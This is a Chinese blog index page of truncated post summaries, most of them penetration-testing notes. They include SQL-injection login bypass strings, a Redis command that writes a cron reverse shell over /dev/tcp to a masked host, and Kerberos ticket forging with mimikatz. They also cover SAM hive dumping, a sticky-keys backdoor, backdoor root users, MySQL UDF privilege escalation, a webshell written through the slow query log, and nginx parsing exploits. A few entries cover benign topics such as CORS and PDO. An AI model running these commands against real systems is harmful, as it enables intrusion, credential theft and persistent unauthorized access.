摘要:
asp aspx万能密码1:"or "a"="a2:'.).or.('.a.'='.a 3:or 1=1--4:'or 1=1--5:a'or' 1=1--6:"or 1=1--7:'or.'a.'='a8:"or"="a'='a9:'or''='10:'or'='or'admin'or 1=1#P 阅读全文
摘要:
常用端口号:代理服务器常用以下端口:(1). HTTP协议代理服务器常用端口号:80/8080/3128/8081/9080(2). SOCKS代理协议服务器常用端口号:1080(3). FTP(文件传输)协议代理服务器常用端口号:21(4). Telnet(远程登录)协议代理服务器常用端口:23 阅读全文
摘要:
阅读全文
摘要:
序列化__sleep的时候必要返回一个数组,一定返回对象的属性,否则报错,键值的key不重要,bbbbbbbbb根本不重要,主要是值是不是对象的属性的名字对上,也就是aa就不正确,a正确 这里可以看见如果sleep里面返回的有对应属性的名字a那么后续的操作也就是$de->a='123';,最后序列化 阅读全文
摘要:
web服务器只是提供静态网页解析(如apache),或者提供跳转的这么一种服务。而web中间件或者叫做应用服务器(其包含web容器)可以解析动态语言,比如tomcat可以解析jsp(因为tomcat含有jsp容器),当然它也可以解析静态资源,因此它既是web中间件也是web服务器。不过tomcat解 阅读全文
摘要:
./redis-cli -h 192.168.11.125 -p 58023 set x "\n\n\n*/1 * * * * bash-i &> /dev/tcp/192.168xx/xxx ) 0>&1 \n\n\n" config set dir /var/spool/cron config 阅读全文
摘要:
useradd ceshi #添加用户 usermod -g root ceshi #添加用户到用户组 非交互式更改密码 echo doiido:123456 | chpasswd echo '123456'| passwd --stdin doiido 更改权限 第一个ALL是指网络中的主机 第二 阅读全文
摘要:
当遇到域环境,获取到一个域成员账号后,如果域控制器未打好补丁,则可以利用本文所提到的漏洞,快速获取到域控制器权限。 mimikatz也是可以看见sid的 3. 票据注入 使用mimikatz将票据注入到当前内存中,伪造凭证,如果成功则拥有域管理权限,可任意访问域中所有机器 阅读全文
摘要:
常用的几种跨域处理方法: 1、JSONP 2、CORS策略 3、document.domain+iframe的设置 4、HTML5的postMessage 5、使用window.name来进行跨域 JSONP是通过src属性来跨域,动态添加一个<script>标签来实现。 CORS "跨域资源共享" 阅读全文
摘要:
Metasploit 「跨网段攻击」添加路由表 run get_local_subnets run autoroute -s 172.16.63.0/24 background route print use auxiliary/scanner/portscan/tcp show options 路 阅读全文
摘要:
使用SAMInside获取用户密码 reg save hklm\sam C:/sam.hivereg save hklm\system C:/system.hive 用cain解密 或者复制sam到自己本机上然后再用 mimikatz获取登陆过的账号密码 mimikatz log privilege 阅读全文
摘要:
密码破解 shift后门 shift控制 Windows c:/system32/sethc.exe 换成cmd.exe 追加自己的公钥 ssh-keygen 生成公钥ssh-keygen -t rsa cat ~/.ssh/id_rsa.pub 获取自己的公钥 连接的时候可以指定私钥来连接 ssh 阅读全文
摘要:
MOF提权 UDF提权 select load_file('/var/www/html/udf/udf.so') into dumpfile "/var/lib/mysql/udf.dll" create function sys_eval returns string soname 'udf.so 阅读全文
摘要:
信息收集: Google Bing Baidu Yahoo 子域名挖掘机 主站爬取-crossadmin.xml Whois 反查询 https://www.benmi.com Ip反查询 Site.ip138.com 工具:Subdomainbrute sublist3r 服务信息收集: 大小写敏 阅读全文
摘要:
开启日志的情况下 access.log 用burp让其转义,然后用文件包含可以执行其中代码 general_log slow.log set global slow_query_log=1; set global slow_query_log_file='D://404.php' -- 地址 sel 阅读全文
摘要:
以下转自clancyb00m的github nginx nginx <8.03 空字节代码执行漏洞 影响版本:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37 上传图片马然后这样访问: 就会执行PHP代码 nginx 1.6.2 如果hack.php不存在,就会以.ph 阅读全文
摘要:
使用sqlmap用dump就要进行拖K,在本地C中的sqlmap,在c盘搜索sqlmap/outpot/ip/dump/中 sqlmap的语法结构 分为免python环境的和需要python python sqlmap.py -(u|r) "(url|text)" -p "id" -u url -r 阅读全文
摘要:
nslookup正向解析为ip地址 nslookup www.baidu.com nslookup -q=ptr ip地址 逆向解析域名地址 nslookup -q=mx 查询邮件交换记录 nslookup set q=mx netstat -anb 显示各种网络相关信息 tasklist 看系统上 阅读全文
摘要:
Mid(database() from 1 for 1)==mid(databse(),1,1) 在数据库中字符型字段中条件值为false可以获取全部数据 数据库一般有三种报错 (1)Extractvalue()中第一个为错误参数就会错误报出第二个参数语句 (2)Floor(rand(0)*2) 插 阅读全文
摘要:
基本的连接使用 php中PDO的使用 php中面向对象的使用mysqli() php中面向过程的使用mysqli_connect() 关于PDO 注意上面bindParam只能用在PDO中 解决占位符中文不支持的办法占位: 阅读全文